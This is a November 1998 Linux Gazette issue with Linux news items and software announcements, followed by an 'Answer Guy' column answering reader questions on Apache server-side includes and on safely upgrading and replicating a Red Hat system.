The December issue of Linux Journal will be hitting the newsstands November 6. The focus of this issue is System Administration. We have an interview with Linus Torvalds and an article about the 2.2 kernel. We also have articles on X administration and performance monitoring tools. Check out the Table of Contents at http://www.linuxjournal.com/issue56/index.html. To subscribe to Linux Journal, go to http://www.linuxjournal.com/ljsubsorder.html.


 TIME Talks about Linux

Check out this cool article in TIME!

http://cgi.pathfinder.com/time/magazine/1998/dom/981026/technology.the_mighty_f1a.html.


 Design by Contract

Dr. Bertrand Meyer, designer of the Eiffel programming language, was in Seattle to give his one-day seminar on "Design by Contract". The purpose of this workshop is to teach software engineers this unique object-oriented development method, which emphasizes building reliable systems through well-defined specifications and communication between the different parties to the system.

Talking to Dr. Meyer by phone, I asked him how Eiffel was better than Java. He gave me three reasons:

When I asked him about Open Source and Linux, he replied, "Eiffel's primary library was released as open source on August 4, and other libraries will be released in the future. While Eiffel is a commercial product, we see the advantages of Open Source. We were one of the first supporters of Linux, and the Linux community is very important to us."

by


 Debian and the NetWinder

It is now possible to boot the Corel NetWinder Computer with Debian GNU/Linux, thanks to the work of Jim Pick and the other team members of the Debian Arm port. A disk image with instructions on how to use it is available from ftp://ftp.jimpick.com/pub/debian/netwinder/bootable-image/

A kernel package of the new ELF kernel is also available (some notes are at http://www.netwinder.org/~rahphs/knotes.html).

This alleviates the need for the chroot environment that previous development work was being conducted in, and allows work to progress even faster than before. This will also allow more people to join in the development effort easily.

Open Letter from Corel to Debian


 Corel Computer and Red Hat Software Announce Linux Operating System Partnership

Ottawa, Canada, October 27, 1998: Corel Computer and Red Hat Software, Inc. today announced an agreement to bring the Red Hat distribution of Linux to the Corel Computer NetWinder family of thin-clients and thin-servers. Under the three-year agreement, Red Hat will port Red Hat Linux 5.1 and future releases of the software to the StrongARM processor, the underlying architecture of the NetWinder.


 SPI Web Pages Active

Date: Thu, 29 Oct 1998 10:33:43 -0500
Software in the Public Interest, Inc. is pleased to announce its new web pages. They can be found at http://www.spi-inc.org/. SPI is a non-profit organization that was founded to help projects develop software for the community. Several projects are currently being supported through monetary and hardware donations that have been made to SPI. As SPI is a non-profit organization, all donations to it and the projects it supports are tax deductible.

Projects that are affiliated with and receive support from SPI are:

For more information:
SPI Press Contact,
SPI homepage: http://www.spi-inc.org/


 Amiga/LinuxInfo starts a daily news section for Amiga and Linux

The leading printed Amiga magazine in Sweden, AmigaInfo, is starting a daily news section in Swedish for Amiga and Linux news.

AmigaInfo will also start a large Linux section (about 25 pages to start with) in the upcoming issue.

http://www.xfiles.se/amigainfo/


 Oppression?

A student at UCLA, and several of the Linux users there in the dorms claim they are experiencing severe discrimination. The whole story is at http://www.nerdherd.net/oppression/. Take a look!


 Debian GNU/Linux 2.0 Hamm

The Debian GNU/Linux 2.0 'Hamm' distribution was recently recognized by Australian Personal Computer Magazine http://www.apcmag.com/. It received the 'Highly Commended Award' for being 'a very high-quality distribution, with an extensive selection of carefully prepared software packages.'

More information including a review of the distribution can be found at http://apcmag.com/reviews/9809/linux.htm.


 Check Out This New Mailing List

Check out

About this mailing list:
The purpose of this mailing list is to provide an open forum to discuss anything related to starting, growing and maintaining Linux User Groups. Whether you are trying to get a new LUG started and need some practical advice, or have built one already and are willing to help other groups, this is the mailing list for you, whether you have 5 members or 500!

How to subscribe to this list:
Send a message to [email protected] with the following text in the message body:
subscribe lug_support YOUR_EMAIL_ADDRESS


 Free Software Award Event Kicks off "One World, One Net" Conference

Larry Wall received the First Annual Free Software Foundation Award for the Advancement of Free Software at the MIT Media Lab on Friday evening. At a reception and presentation attended by CPSR Conference registrants, computer hackers and members of the press, FSF Founder Richard Stallman presented the award, a quilted GNU (GNU's Not Unix) wall hanging.

Larry Wall won the Free Software Foundation Award for the Advancement of Free Software for his programming, most notably Perl, a robust scripting language for sophisticated text manipulation and system management. His other widely-used programs include rn (news reader), patch (development and distribution tool), metaconfig (a program that writes Configure scripts), and the Warp space-war game.


 Eureka!

On Tuesday, September 15th, 1998 in Paris, France at our user event named "Eureka", and again on October 5th at DECUS in Los Angeles, Compaq Computer Corporation announced its intent to extend its support for the Linux operating system to include the Intel as well as the Alpha platforms. In addition to extending this support to another architecture, Compaq is in the process of putting together a comprehensive program of Linux support.

This support includes, but is not limited to:

In continuing the concept of working with the Linux community, Compaq intends to extend its Linux support through its extensive channels partner programs. Compaq feels that this will give the broadest possible selection of products and solutions to our end customers, with our VARs, OEMs, Distributors and Resellers working with the customer to match the distribution, the layered products and third party offerings to that customer's needs.


 IBM Enhances its Websphere Application Server

IBM announced that it has extended the HTTP services in IBM WebSphere* Application Servers in the areas of performance, security and platform support by adding new functionality to the HTTP services that are packaged with WebSphere and are based on the Apache HTTP Server.

Today's announcements include technology developed by IBM Research that boosts the performance of HTTP services in the IBM WebSphere Application Server and Secure Socket Layer (SSL) support that provides customers with the security necessary to operate a web site that can handle sensitive information, such as financial transactions. In addition, IBM announced a port of the Apache HTTP Server to the AS/400* operating system. The AS/400 port will be offered to the Apache Group through the Open Source model. The Fast Response Cache Accelerator (FRCA) technology, developed by IBM Research, doubles the performance of HTTP services in WebSphere on Windows NT, according to lab tests done by SPEC (The Standard Performance Evaluation Corporation).

Both the FRCA and SSL technologies from IBM will be available at no additional charge as part of all editions of the IBM WebSphere Application Servers. The technologies will be released in the next version of WebSphere Application Server before the end of the year. The FRCA technology will also be used to boost the performance of the HTTP Server for OS/390*, and will be available as part of OS/390 Version 2 Release 7 in March of 1999.


 CommProc

A new OpenSource project, a general distributed-computing toolkit for quick assembly of distributed applications called CommProc, was presented at the October ApacheCon98 conference. CommProc is an advocacy effort for Linux and Apache and includes an interface module for the Apache HTTP server. Documentation and source code for the project is available at: http://www.commproc.com


 Launch of LinuxWorld Magazine

IDG's Web Publishing Inc. announced the launch of LinuxWorld magazine (http://www.linuxworld.com), a Web-only magazine supplying technical information to professional Linux users who are implementing Linux and related open source technologies in their computing environments.

Inside the first issue are stories such as an interview with Linus Torvalds, the first installment of the Linux 101 column titled "A distribution by any other name," and a look at the new Windows NT domain security features found in Samba 2.0 titled "Doing the NIS/NT Samba."


 Linux Expo 1999 Call for Papers

May 18 - 22, 1999
Raleigh, North Carolina
Dates for Refereed paper submissions

Program Committee

Overview

The goal of the technical track of Linux Expo is to bring together engineers and researchers doing innovative work associated with Linux.

See you at LinuxExpo '99!


 USENIX 1999 Events

USENIX is the Advanced Computing Systems Association. Its international membership includes engineers, system administrators, scientists, and technicians working on the cutting edge. Their conferences are recognized for delivering pragmatically-oriented, technically excellent reports in a highly interactive, vendor-neutral forum.

Upcoming Events for 1999


 SmartWare DevCon99

Date: Wed, 28 Oct 1998 20:28:52 -0600
DevCon99 is scheduled for November 14 and 15, 1998: 49 hours of training shoehorned into two days, including "How to Use the Graphic Database Frontend", developing a RAD application, the introduction of the SmartERP program, marketing, advertising and free videotapes for all attendees. SmartWare2000 offers solutions for the small-to-medium company and is the only product capable of running on everything from old 286 ATs up to Sun or SiliconGraphics systems while using the same data at the same time.

When: November 13 (Dinner at Clubhouse Inn), 14 & 15
Where: Washburn University, Topeka, Kansas
What: 2 Full Days of training on SmartWare2000, The Graphic Database Front End, RAD, Free SmartWare2000, Food, Room, Videos and more.

For more information:
Greg Palmer,


 Linux Links

Linux FAQ: http://www.terracom.net/~kiesling/

QtEZ, a GUI builder for the Qt library: http://qtez.zax.net/qtez/

Blackmail 0.29: http://www.jsm-net.demon.co.uk/blackmail/source/blackmail-0.29.tar.gz

SGMLtools homepage: http://www.sgmltools.org/

Distribution Answers: http://www.angband.org/~joseph/linux/

Mini-howto on setting up Samba on Red Hat Linux: http://www.sfu.ca/~yzhang/linux/

PostgreSQL Database HOWTO: http://sunsite.unc.edu/LDP/HOWTO/PostgreSQL-HOWTO.html

DragonLinux: IronWing: http://members.tripod.com/~dragonlinux/


Software Announcements


 Cygnus Solutions Announces Low-Cost Versions of GNUPro Toolkit for Linux

Cygnus(R) Solutions announced the availability of GNUPro(TM) Toolkit, a new product line of fully tested, low-cost development tools releases for native and embedded software developers. Addressing the needs of the growing Linux community, the first release of Cygnus GNUPro Toolkit is targeted at software engineers developing commercial applications on the Linux operating system (OS). Today's announcement marks the first in a series of GNUPro Toolkit releases planned for a range of platforms. "Cygnus has extended its commitment to the Linux community and users of Red Hat Linux by providing a fully-certified official release of GNU development tools," said Bob Young, president and CEO of Red Hat Software. "Given the increasing popularity of both Red Hat Linux and Cygnus GNUPro, Red Hat is pleased to continue its partnership with Cygnus to provide software developers the highest quality Linux operating system and development tools."

Key Features and Benefits

Pricing and Availability

Cygnus GNUPro Toolkit for Linux is priced at $149 and is immediately available for Red Hat Linux 4.2 and 5.1 on x86 platforms by ordering online at http://www.cygnus.com/gnupro/.


 Panorama

Panorama is part of the GNU project. For more information about it, visit the URL 'http://www.gnu.org'. It is released under the GPL license, which you can read in the file 'LICENSE' in the distribution.

Panorama is a framework for 3D graphics production. This will include modeling, rendering, animating, post-processing, etc. Currently, there is no support for animation, but this will be added soon.

Functionally, it is structured as an API, composed of two dynamic libraries and several plugins that you can optionally load at runtime. A simple console-mode front-end for this API is included in the package; it can load a scene description in one of the supported scene languages and then output a single image file in any of the supported graphic formats.

Panorama can be easily extended with plugins. Plugins are simply dynamically linked C++ classes. You can add plugins without recompilation, and even at runtime once this option is added to the graphic interface.

You can find more information about Panorama, or download the latest distribution, at: http://www.gnu.org/software/panorama/panorama.html


 Netscape Wrapper v2.0.0

What is it:
The Netscape Wrapper is a Bourne shell script used to invoke Netscape on a Unix platform. It copies initial default files, works around a PostScript bug, performs a security check, and sets up the environment. The new version also provides enhanced functionality.

What is new in this version:

The most significant change is that the script will attempt to open a new browser window before executing Netscape; i.e. if no Netscape process is present, Netscape will be executed, otherwise a new browser window is created. Likewise, when using the new option subset: if Netscape is not running, it will be executed with that option as the default window; if Netscape is running, that option will be opened using the current process.

ftp://ftp.psychosis.com/linux/netscape-wrapper_2.0.0


 plotutils

Version 2.1.6 of the GNU plotting utilities (plotutils) package is now available. This release includes a significantly enhanced version of the free C/C++ GNU libplot library for vector graphics, as well as seven command-line utilities oriented toward data plotting (graph, plot, tek2plot, plotfont, spline, ode, and double). A 130-page manual in texinfo format is included.

As of this release, GNU libplot can produce graphics files in Adobe Illustrator format. So you may now write C or C++ programs to draw vector graphics that Illustrator can edit. Also, the support for the free `idraw' and `xfig' drawing editors has been enhanced. For example, the file format used by xfig 3.2 is now supported.

RPM's for the plotutils package are available at ftp://ftp.redhat.com

For more details on the package, see its official Web page.


 PROCMETER V3.0

This is a new version of ProcMeter that has been re-written almost completely since the previous version.

It is now designed to be more user-friendly and customisable; the textual as well as graphical outputs and the extra mouse options available are part of this. It is perhaps now less of a system status monitor and more of a user information display. It can be configured to show the date and/or time instead of having a clock, and it can also monitor your e-mail inbox and act like biff.

The ProcMeter program itself is a framework on which a number of modules (plugins) are loaded. More modules can be written as required to perform more monitoring and informational functions. Available at ftp://ftp.demon.co.uk/pub/unix/linux/X11/xutils/procmeter3-3.0.tgz

Take a look at the ProcMeter web page


 ypserv 1.3.6

Version 1.3.6 of a YP (NIS version 2) server for Linux has been released. It also runs under SunOS 4.1.x, Solaris 2.4 - 2.6, AIX, HP-UX, IRIX, Ultrix and OSF1 (alpha).

These programs are needed to turn your workstation into an NIS server. The package contains ypserv, ypxfr, rpc.ypxfrd, rpc.yppasswdd, yppush, ypinit, revnetgroup, makedbm and /var/yp/Makefile.

ypserv 1.3.6 is available under the GNU General Public License.

You can get the latest version from: http://www-vt.uni-paderborn.de/~kukuk/linux/nis.html


 MAM/VRS

MAM/VRS is a library for animated, interactive 3D graphics, written in C++. It works on Unix (tested on Linux, Solaris and Irix) and Windows 95/98/NT. MAM/VRS can produce output for many rendering systems: OpenGL (or Mesa), POVRay, RenderMan and VRML are supported so far. It provides bindings to many GUIs: Xt (Motif/Lesstif/Athena), Qt, Tcl/Tk, MFC and soon GTK. It is covered by the terms of the GNU LGPL. Visit our homepage for more information and to download it: http://wwwmath.uni-muenster.de/~mam


 KIM - interactive process manager 1.1-1

Description:
Kim is an interactive (ncurses-based), user-friendly process manager for Linux. It reads the /proc(5) directory; /proc is a pseudo-filesystem which is used as an interface to kernel data structures.

Features:

Download:

* source, rpm, deb

URL: http://home.zf.jcu.cz/~zakkr/kim/

Version & Dependency:
Kim is independent of other programs, but all versions depend on libproc >= 1.2.6 and ncurses.

License:
Copyright (c) 1998 Zak Karel "Zakkr"


 PIKT

PIKT is a set of programs, scripts, data and configuration files for administering networked workstations. PIKT's primary purpose is to monitor systems, report problems (usually by way of e-mail "alerts"), and fix those problems when possible. PIKT is not an end-user tool; it is (for now) to be used by systems administrators only.

PIKT includes an embedded scripting language, approaching in sophistication several of the other scripting languages, and introducing some new features perhaps never seen before.

PIKT also employs a sophisticated, centrally managed, per-machine/OS version control mechanism. You can, setting aside the PIKT language, even use it to version control your Perl, AWK, and shell scripts. Or, use it as a replacement for cron.

PIKT is freeware, distributed under the GNU copyleft.

Check out the Web Page for more info!


 Yard 4.04.03

YARD-SQL version 4.04.03 has been released. It is currently available for Linux and SCO UNIX and contains the following new features:

Check out http://www.yard.de for more information about YARD


 RealSecure 3.0

ISS today announced RealSecure 3.0, a new, integrated system that combines intrusion detection with state-of-the-art response and management capabilities to form the industry's first threat management solution. Formerly known as "Project Lookout", RealSecure 3.0 integrates network- and system-based intrusion detection and response capabilities into a single enterprise threat management framework, providing around-the-clock, end-to-end information protection.

Visit the ISS web site.


 Applix Released Applixware 4.4.1 for Linux, UNIX, and Windows Platforms

Applix, Inc. announced the release of Applixware 4.4.1 for the Linux platform as well as all major UNIX operating systems, Windows NT and Windows 95. This latest release delivers a new filtering framework that has been optimized for document interchange with Microsoft's Office 97 product, as well as Y2K compliance.

Applixware includes Applix Words, Spreadsheets, Graphics, Presents, and HTML Author. This Linux version also includes Applix Data and Applix Builder as standard modules. Applixware for Linux is available directly from Applix, as well as from its partners, including Red Hat and S.U.S.E.

Linux version beta test users also attest to the results. "Export of Applix Words documents to Word 97 works great, even with Swedish letters," said Klaus Neumann, a university cognitive scientist. He continued, "I think Applixware is the most promising office solution for Linux. I've tried StarOffice, WordPerfect, Lyx. Nothing comes even close to Applixware--there are none of the memory, uptime, printing, or spell-checking problems I experience with the other suites."

Applixware 4.4.1 for Linux includes for the first time Applix Data, a new module offering point and click access to information stored in relational databases. No SQL knowledge is required to access the information. Once accessed, the data can be linked directly into Applix Words, Spreadsheets, Graphics, Presents, and HTML Author.

Visit the company's web site for more information.


 iServer

Servertec announced the release of iServer, a small, fast, scalable and easy-to-administer, platform-independent web server written entirely in Java(TM).

iServer is a web server for serving static web pages and a powerful application server for generating dynamic, data-driven web pages using Java Servlets, iScript, the Common Gateway Interface (CGI) and Server Side Includes (SSI).

iServer provides a robust, scalable platform for individuals, work groups and corporations to establish a web presence.

Visit the Servertec Web site for more information.


 TkApache v1.0

TkApache v1.0 was released unto the unsuspecting world on Thursday, October 16th. In its first few hours, more than 1,000 downloads were logged!

Anyway, it's a full GUI front-end for managing and configuring an Apache web server, and it's written in Perl/Tk - released under the GPL and developed COMPLETELY under Linux: web site, graphics, code, etc.

The TkApache home page could tell you a lot more...


 Crack dot Com is closing its doors

WHY: Ran out of cash.

REALLY WHY: Lot of reasons, but then again, there are a lot of reasons that we got as far as we did. I think the killer reason, though, was that Golgotha was compared by publishers primarily to Battlezone and Uprising, and those titles sold really poorly.

WHAT NOW?: Now we file articles of dissolution w/ the secretary of state, and we file bankruptcy.

IS THAT IT?!: No.

WHAT ELSE?: We're releasing the Golgotha source code and data to the public domain.

WHERE'S THE SOURCE CODE?: I want to personally thank everyone who supported & rooted for us. That was really nice of you.

BLAH BLAH, WHERE'S THE SOURCE?: I want to apologize to the fans and business partners we've let down.

BOO HOO! WE CARE. OUT WITH IT!: Thanks for your patience. The source & data can be found at http://www.crack.com/golgotha_release. And of course, the ex-Crack developers are up to new & interesting things which you can follow at the web site.

Sincerely, Dave Taylor


Published in Linux Gazette Issue 34, November 1998




This page written and maintained by the Editor of Linux Gazette,
Copyright © 1998 Specialized Systems Consultants, Inc.

(?) The Answer Guy (!)


By James T. Dennis,
Starshine Technical Services, http://www.starshine.org/


Contents:

(!)Greetings From Jim Dennis

(?)dual /boot partitions --or--
Automated Recovery from System Failures
(?)e-mail quotas --or--
Quotas for Outgoing e-mail
(?)Booting and partitions --or--
Suggestions for Linux Users with Ultra Large Disks
(?)French loadkeys --or--
More on International Keyboard Mappings and Monochrome X
(?)Digi C/X Host W/ C/Con 16 --or--
Linux Support for the DigiBoard C/X Intelligent Serial Ports
(?)Shell File!!!!! --or--
All that Vaunted Support for those Windows Users
(?)apache server --or--
Executing "Normal HTML" Files with Apache
(?)Keeping my RH5.0 system up to date --or--
Updates: Risks and Rewards
(?)Ether Troubles --or--
NE2000 "clones" --- not "cloney" enough!
(?)"Good Times"-email is it a virus? --or--
The Infection and the Cure: (Good Times as a Virus)
(?)Query
(?)... Redhat 4.2/Motif, problem discovered. --or--
Conflict: Num-Lock, X Window Managers, and pppd
(?)Re Script
(?)Here's a doozy --or--
Telnet/xterm: Log to file
(?)RE how to find out the serial connect speed of a modem
(?)HELP!! --or--
Finding Soundcard Support
(?)Problems with backup --or--
Problems with a SCSI Tape Drive
(?)Is there a testsuite for glibc v2.0.x? --or--
Test Suites for GNU and other Open Source (TM) Software
(?)nt 4.0 ras dialin problem --or--
Another Non-Linux Question
(?)Macro Virus?
(?)xdm --or--
Remote X using xdm


(!)Greetings From Jim Dennis


(?)Executing "Normal HTML" Files with Apache

From ajrlly on 26 Sep 1998

Is there a way to configure Apache so that when someone requests a particular page (i.e. http://www.whatever.com/~user/index.html) a CGI script is automatically invoked, transparently to the requester? The goal is to have a different page served depending on the IP address.

thnx

(!)I think you could use the "x-bit hack" feature --- mark the index.html page as a Unix/Linux "executable" and use SSI (server-side include) directives to accomplish this.
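As a rough sketch of how that looks (the directive and variable names are from Apache 1.3's mod_include; the user path and file names are made up for illustration): turn on the feature with
XBitHack on
in httpd.conf or an .htaccess file, mark the page executable ('chmod +x ~user/public_html/index.html') and then, inside index.html, branch on the requestor's address:
<!--#if expr="${REMOTE_ADDR} = /^192\.168\./" -->
<!--#include virtual="index-internal.html" -->
<!--#else -->
<!--#include virtual="index-external.html" -->
<!--#endif -->
Treat that as a starting point rather than gospel --- check the mod_include documentation for the expression syntax your version supports.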
There are also various modules for Apache to support XSSI (extended server-side includes), ePerl and EmbPerl (embedded Perl interpreters which execute code in your documents), and other forms of dynamic output.
For real details you should probably read the FAQ --- try http://www.apache.org for access to that.
In addition that FAQ recommends the comp.infosystems.www.servers.unix newsgroup for general support. There are also a couple of companies that offer commercial support for the system.
You can read about new developments in Apache by regularly visiting the Apache Week web site (http://www.apacheweek.com), which should probably be right next to "Linux Weekly News" (http://www.lwn.net) on your list of weekly sites to visit.
Unfortunately they don't seem to have an "answer guy" over at Apache Week --- so we can't forward your question off to him.
Personally I don't like the idea of publishing different "apparently static" web pages based on the IP address of the requestor. First it seems deceitful. Also IP addresses and DNS domains (reverse or otherwise) are very poor ways of identifying users or readership. In addition these sorts of "dynamic" pages put extra load on the server and add additional latency to the request. This is a particularly bad idea for index.html pages --- which are the most often accessed.
I think it is best to identify what you really want the world to see (a process of writing, composition and publication) and put that into your main static web pages. If you need timely or periodic updates (web counters, whatever) use a cron job to periodically re-"make" the static pages from their "sources" (templates) using the text processing tool of your choice (m4 and the C preprocessor, cpp, seem to be particularly popular for this, although many specialized tools exist for the task).
Part of this also depends on what you're really trying to do. For example, if you want "internal" users to see one set of pages and "external" users to see another --- your best bet is to configure your server with two interfaces (or at least IP aliases) and use the Apache "BindAddress" directive to bind one copy of the Apache server to one IP address/interface and a different one (with different configuration, document root, etc.) to the other.
Naturally each of your virtual hosts ("soft" using HTTP 1.1 features, or "hard" requiring separate IP addresses) can have completely different document roots and many other configuration differences. All of that falls under the category of "virtual hosting" and is covered pretty extensively in the Apache documentation (which is all available at the aforementioned web sites).
If you're trying to provide information in a different language or format based on the source of the request you should read about "Content Negotiation" at:
Apache Week: 26th July 1996
http://www.apacheweek.com/issues/96-07-26
If you're attempting to do this based on "security" or "cookies" there are extensive methods for doing this supported by Apache --- and most of them are most easily accomplished by performing "redirection" as the connection is established.
For real security --- to provide web pages to your "extranet" partners (strategic customers, vendors, etc) and your mobile employees --- I wouldn't suggest anything less than "client side certificates" over SSL (secure sockets layer --- a set of encryption protocols, proposed by Netscape and implemented by many browsers and in several other packages. The dominant "free" SSL code base is SSLeay --- by Eric A. Young of Australia).
These sorts of certificates are issued to users on an individual basis (they can be from a recognized third-party CA --- certifying authority --- or you can create your own "in-house" CA and accept those, exclusively or otherwise).
There are a large number of modules available for Apache: some do things like block access based on the "Referrer" value (to prevent other web sites from using your pictures and bandwidth by "reference", for example), or fix UpperVSLOWER/CasING/ problems in the requested URL's; and there are a couple of different ones to perform rewriting of request URL's --- like the mod_rewrite module, which supports full regex re-writes and some weird conditional and variable assignment features.
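To come back to the original question, a mod_rewrite sketch along these lines would do it (Apache 1.3 syntax; the address block and file names are invented for illustration):
RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^192\.168\.
RewriteRule ^/~user/index\.html$ /~user/index-internal.html [L]
... which silently hands one class of readers a different copy of the page --- with all the caveats about "apparently static" pages I mentioned above.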
The "official" place to learn about Apache modules seems to be the "Module Registry" at http://www.zyzzyva.com

[ It moved to http://modules.apache.org/ which is much easier to remember too. Update your bookmarks, everybody :) -- Heather ]


(?)Updates: Risks and Rewards

From Frits Hoogland on 08 Oct 1998

Hi almighty answerguy!

I'm a bit confused by all the updates of various system components (like the libc, gcc, etc., etc.). Is it advisable to look at ftp.redhat.com for updates to my 5.0 system? Is it advisable to download a new kernel? Can I install, let's say, kernel 2.0.35 (which, as I noticed, nearly everyone uses) or are there things I have to consider, things I have to check, etc.?

(!)That's an excellent question. Using Red Hat's package management system (RPM) does make it faster and easier for most "mere mortals" (myself included) to upgrade most packages and install most new ones.
Debian package management is allegedly at least as good --- but it doesn't seem to be documented nearly as well so it's harder to learn than RPM. (Hey, Debian dudes if you write a DPKG/APT Guide for RPM users --- you might win more converts!).
Even Slackware's pkgadd (or is that pkg_add, it's been so long) is somewhat easier than the old "manly" way of upgrading your software (downloading the sources, and building them yourself).
Indeed, even that approach (building from sources) has improved quite a bit over the years, for most packages. The mark of a good modern package is that you can install it from source with the following sequence of commands:
tar tzf /usr/local/from/foo.tar.gz
# look at contents, insure that it creates
# it's own directory tree and puts everything
# in there:
tar xzf ....
cd /usr/local/src
# extract the sources into our local source
# tree.  (Might need to do a mkdir and cd into
# that if your package extracts to the "current"
# directory).
cd $package_source_top_level_dir
view README
# or 'more' or 'less' -- maybe different README's
# This should have some basic instructions
# which ideally will amount to:
./configure
# possibly with options like --prefix=/usr/local
make install
... Note that the really important parts of this are './configure' and 'make install'. After that, a good source package should be ready to configure and run.
(Note that the "configure" command in my examples is a script generated to perform a set of local tests and select various definitions that are to be used by the make file. This, in turn, tells the local system how to "make" the program's binaries, libraries, man pages and other files in a way that's suitable for your system --- and (with the commonly implemented "install" option or "target" in "makefile" terms) tells the 'make' command where to put things. There is a difference between "./configure"-ing the sources to be built and "configuring" the resulting package).
In any event, with RPM's you get the package (for your platform: x86, Alpha, SPARC, PowerPC, etc) and type:
rpm -i foo-$VERSION.$PLATFORM.rpm
... or whatever the file's name is. To upgrade a source package you follow mostly the same procedure as for installing from sources (usually saving any configuration files and/or data from the previous versions, and maybe moving or renaming all of the old libs and bins and other files). It would be nice if source package maintainers made upgrades easier by detecting their prior installed version and suggesting a "make upgrade" command --- or something like that.
To upgrade a typical RPM you just type:
rpm -U foo.....rpm
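A couple of related rpm commands are worth knowing before you pull the trigger (both are stock rpm options):
rpm -qa | grep foo
... to see which version, if any, is already installed, and:
rpm -U --test foo.....rpm
... to rehearse the upgrade without actually changing anything.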
There are similar commands for Debian, but I don't know them off the top of my head and they aren't handy to look up from this S.u.S.E. (RPM) system.
(I'm sure I'll get flamed for the perceived slight --- oh well. Comes with the territory. Please include techie info and examples with the flames).
Now, when it comes to major system upgrades (like libc5 to glibc, and from a 1.x kernel to a 2.x kernel) it's a different matter.
If you have a libc5 system and you just install glibc onto it, there's no real problem. The two will co-exist. All of your existing libc5 programs will continue to load their shared libraries, and all your glibc2 (a.k.a. libc6) linked programs should find the new library. Running a mixture of "typical" programs from both libraries will have no important effects (although you'll be using more memory than you would if all your binaries were linked against the same libraries).
Notice I said "typical" --- when it comes to system utilities, like the 'login' command there are some interactions that are significant and even incompatible. I've heard that the format of the "utmp" and "wtmp" records are different (these are user and "who" log files) which are accessed by a whole suite of different utilities (like the 'who' and 'w' commands, the 'login' and 'xdm' commands, 'screen' and other utilities).
So, it's best to upgrade the whole system to glibc at once. (The occasional application --- one that is not part of the base "system" and isn't "low level" --- that uses a different version/set of libraries won't be a problem.)
With most recent kernels you can install the sources under /usr/src/linux and run the following command:
make menuconfig
(go through a long list of options to customize the kernel to your system and preferences)... or copy in your old .config file and type:
make oldconfig
... to focus on just the differences between the options listed/chosen for your previous kernel and the new one.
Then you'd type something like:
make clean dep install modules modules_install
... and wait awhile.
I've done kernel upgrades that were that easy. Usually I read the "changelog" and other text files, and the help screens on most of the new options (I usually also have to refresh my memory on a couple dozen old options).
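Spelled out a little more fully, a typical build-and-install pass for a 2.0.x kernel looks something like this (the target names are from the stock kernel makefiles; the version number and the lilo.conf step are illustrative):
cd /usr/src/linux
make dep clean
make bzImage
make modules modules_install
cp arch/i386/boot/bzImage /boot/vmlinuz-2.0.35
... then add a matching image= stanza to /etc/lilo.conf and re-run /sbin/lilo before rebooting.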
These are major upgrades because they can affect the operation of your whole system.
Recently my father (studying Mathematica) needed a better video card. This was an old VLB (VESA Local Bus) 486 running Red Hat 4.1. So I decided to build a new system (Pentium 166, PCI video card, new 6Gb UDMA hard disk) and upgrade his system to Red Hat 5.1.
So, here's how I did that:
Build new hardware, boot from a customized copy of Tom Oehser's "root/boot" diskette (http://www.toms.net/rb) and connect to the LAN using a temporary IP address that we have reserved for this purpose.
I then run fdisk on the new drive and issue a command like:
for i in 1 3 5 6 7; do mke2fs -c /dev/hda$i; done
(to make filesystems on all of the partitions: root, rescue root, /usr, /home and /usr/local). I go away and answer e-mail and get some coffee, getting thoroughly sidetracked.
A day or so later I remember to finish work on that (he reminds me that he has some homework to do).
Now I mount all of these filesystems the way I want them to be later (when I reboot from the hard disk). So I mount the new rootfs under /mnt/den (the machine's name is Deneb --- an obscure star) and the new usr under /mnt/den/usr and the new /usr/local under /mnt/den/usr/local (etc).
Then I copy his old /etc/passwd and /etc/group files into the ram disk (see below) and issue a command like the following:
rsh deneb "cd / && find . | cpio -o0BH crc " \
| ( cd /mnt/den && cpio -ivumd )
... this copies his entire existing system to the new system.
When that's done (doesn't take long, but I don't time it --- it runs unattended until I get back to it), I edit the /mnt/den/etc/fstab, run a chroot command (cd /mnt/den && chroot . /bin/sh), fix up the lilo.conf file and run /sbin/lilo, and reboot (with the root/boot diskette removed).
Now I've replicated his whole system (and accidentally knocked his machine off of our LAN, because I forgot to reset the IP address of this box). So, I fix that.
I make a last check to make sure that everything *really* did copy over like I wanted:
cd / ; rsh den " cd / && tar cf - . " | tar df -
... this copies all of his files back over the net again (this time using 'tar' instead of cpio), but the receiving copy just compares (diffs) the incoming file "archive" (from its standard input, a.k.a. the pipelined data) rather than extracting the files and writing them into place.
This reports a few differences among some log files and the /etc/ files that I modified, and it gives some errors about "sockets" (Unix domain sockets show up in your file tree as little filenames with an "s" as the leading character in 'ls -l' output; there are about five or six of these on a typical system: one for your printer, one for your syslog and one or two for any copies of X Windows or 'screen' you may have run. These should not be confused with "internet domain" sockets, which only exist in memory and go through your IP interfaces).
I presume that the tar diff feature simply doesn't support Unix domain sockets; it's probably a bug, but not a significant one to me.
A different bug in 'cpio' is a bit irritating and I have to report it to their maintainer. Remember how I copied over my old passwd and group files before the transfer? There's *supposed* to be an option to "use the numeric UID and GID" (-n or --numeric-uid-gid) in 'cpio' (and a similar one in newer versions of 'tar'). However, my copies (on several machines from several distributions around the house) all just give an error if I try to use that switch. Not a reasonable error message like: "option not supported" or "don't do that you moron" --- just a stubborn insistence on printing the "usage" summary which clearly shows these options as available!
The quickest workaround is to just copy the passwd and group files to the local system before attempting the "restore" (replication). One time when I failed to do this (using a version of 'tar' that didn't support the feature) it squashed the ownership of every file to 'root' --- resulting in a useless system. Luckily I was just playing around that other time, so I learned to watch out for that.
So, now I just slip in my Red Hat 5.1 CD (courtesy of the IBM booth at last week's ISPCon in San Jose --- where they were giving them out). I think IBM's booth got them from the BALUG (Bay Area Linux Users Group) which is still trying to scrape up a few hundred bucks to pay for the 'free' booth they were offered. (Free means no fees to the convention co-ordinators; we went out of pocket for "renting" tables and chairs and paying for a power extension for the demo computer).
From there I just let the RH 5.1 upgrade process run its course.
What!?! All that work just to let the upgrade run?
Yep!
I spent years in technical support (MS-DOS and Windows markets). I consider vendor and OS upgrades to be the most dangerous thing you can do on your computer. I'm sure they've caused more downtime and lost data than failed hard drives, virus infections, stupid users (other than the stupidity of blind updates), and disgruntled employees.
So, I like to make sure that I can get back to where I started. For me, that means "start with a copy of the system or a restore of the system's backups". I've been known to take a hard drive out of a system, install a new one, restore the backup to that and then do the restore to the "new" system. (The old hard drive stays on a shelf until the data on it is so out of date it would be worth copying back in --- then gets rolled into some other system, or the same one, as "extra disk space").
Now, please don't take this as a personal attack on Linux or Red Hat. So far they haven't failed me. I have yet to see an "upgrade" destroy one of my systems. However, my professional experience has proven to me that this is the right approach even for one of my home systems.
